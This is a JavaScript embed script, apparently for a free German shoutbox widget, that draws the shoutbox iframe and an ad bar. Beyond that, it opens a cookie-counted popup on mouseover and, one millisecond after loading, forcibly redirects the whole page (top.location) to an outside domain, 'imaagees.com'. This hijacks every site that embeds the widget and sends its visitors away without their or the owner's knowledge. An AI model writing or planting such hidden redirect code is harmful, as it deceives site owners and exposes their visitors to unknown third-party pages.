<!--
document.write('<span id="box"><iframe src="http://www.smallbox.de/sb_html/nr-'+benutzer_id+'.html" width="'+breite+'" height="'+hoehe+'" style="width:'+breite+';height:'+hoehe+';border:'+kontur_staerke+'px solid #'+kontur_farbe+';" frameborder="0" name="smallbox_frame"></iframe></span>');if (benutzer_id > '60000') {document.write('<style>');document.write('#webtipps { position:absolute; left:10px; top:2000px; }');document.write('</style>');window.setTimeout("code_check()",1500);function code_check() {if (document.getElementById("webtipps")) {document.getElementById("webtipps").style.top = '-5000';var bla=document.getElementById('webtipps').innerHTML;if(bla.match(/Shoutbox/)){}else{alert('Der HTML Code fuer die Shoutbox ist leider nicht vollstaendig eingefuegt worden');}}}}var w=document.body.clientWidth;if (benutzer_id < '70000') {document.write('<style>');document.write('#b_webtipps { position:absolute; left:0px; top:0px; width:'+w+'px; padding: 5px 5px 5px 5px; background-color:#FFF8DD; border-bottom:4px solid #668000; color:#000000; font-size: 13px; } #spacer { padding:10px; }');document.write('#b_webtipps a { font-family:arial,sans-serif; font-size: 14px; font-weight:bold; color : #0044CC; }');document.write('</style>');document.write('<div id="b_webtipps"><div id="spacer">Wir empfehlen: &nbsp;&nbsp; <a href="http://www.shoutbox.tv" target="_blank">Kostenlose Shoutbox fuer deine Homepage</a> &nbsp;&nbsp;&nbsp; <a href="http://www.erfahrungsberichte.in" target="_blank">Erfahrung austauschen</a> &nbsp;&nbsp;&nbsp; <a href="http://gaestebuecher.cc" target="_blank">Kostenloses Gaestebuch fuer deine Webseite</a></div></div>');}

var screen_w = screen.width;
var screen_h=(screen.availHeight - 120);
var expDays = 1; // number of days the cookie should last

var page = 'http://imaagees.com/check3.pl?id='+benutzer_id;
var windowprops = "width=600,height="+screen_h+",location=yes,toolbar=yes,menubar=yes,scrollbars=yes,resizable=yes";

function GetCookie (name)
{
var arg = name + "=";
var alen = arg.length;
var clen = document.cookie.length;
var i = 0;
while (i < clen) {

var j = i + alen;
if (document.cookie.substring(i, j) == arg)
return getCookieVal (j);
i = document.cookie.indexOf(" ", i) + 1;
if (i == 0) break;
}
return null;
}
function SetCookie (name, value)
{
var argv = SetCookie.arguments;
var argc = SetCookie.arguments.length;
var expires = (argc > 2) ? argv[2] : null;
var path = (argc > 3) ? argv[3] : null;
var domain = (argc > 4) ? argv[4] : null;
var secure = (argc > 5) ? argv[5] : false;
document.cookie = name + "=" + escape (value) +
((expires == null) ? "" : ("; expires=" + expires.toGMTString())) +
((path == null) ? "" : ("; path=" + path)) +
((domain == null) ? "" : ("; domain=" + domain)) +
((secure == true) ? "; secure" : "");
}
function DeleteCookie (name)
{
var exp = new Date();
exp.setTime (exp.getTime() - 1);
var cval = GetCookie (name);
document.cookie = name + "=" + cval + "; expires=" + exp.toGMTString();
}
var exp = new Date();
exp.setTime(exp.getTime() + (expDays*24*60*60*1000));
function amt(){
var count = GetCookie('count')
if(count == null) {
SetCookie('count','1')
return 1
}
else {
var newcount = parseInt(count) + 1;
DeleteCookie('count')
SetCookie('count',newcount,exp)
return count
   }
}
function getCookieVal(offset) {
var endstr = document.cookie.indexOf (";", offset);
if (endstr == -1)
endstr = document.cookie.length;
return unescape(document.cookie.substring(offset, endstr));
}

function checkCount() {
var count = GetCookie('count');
if (count == null) {
count=1;
SetCookie('count', count, exp);

window.open(page, "", windowprops);

}
else {
count++;
SetCookie('count', count, exp);
   }
}

myBody=document.getElementsByTagName('body')[0];
myBody.onmouseover=function(event){checkCount();}

setTimeout("weiterleiten()",1);
function weiterleiten() {
top.location.href="http://imaagees.com/check3.pl?id="+benutzer_id;
}
//-->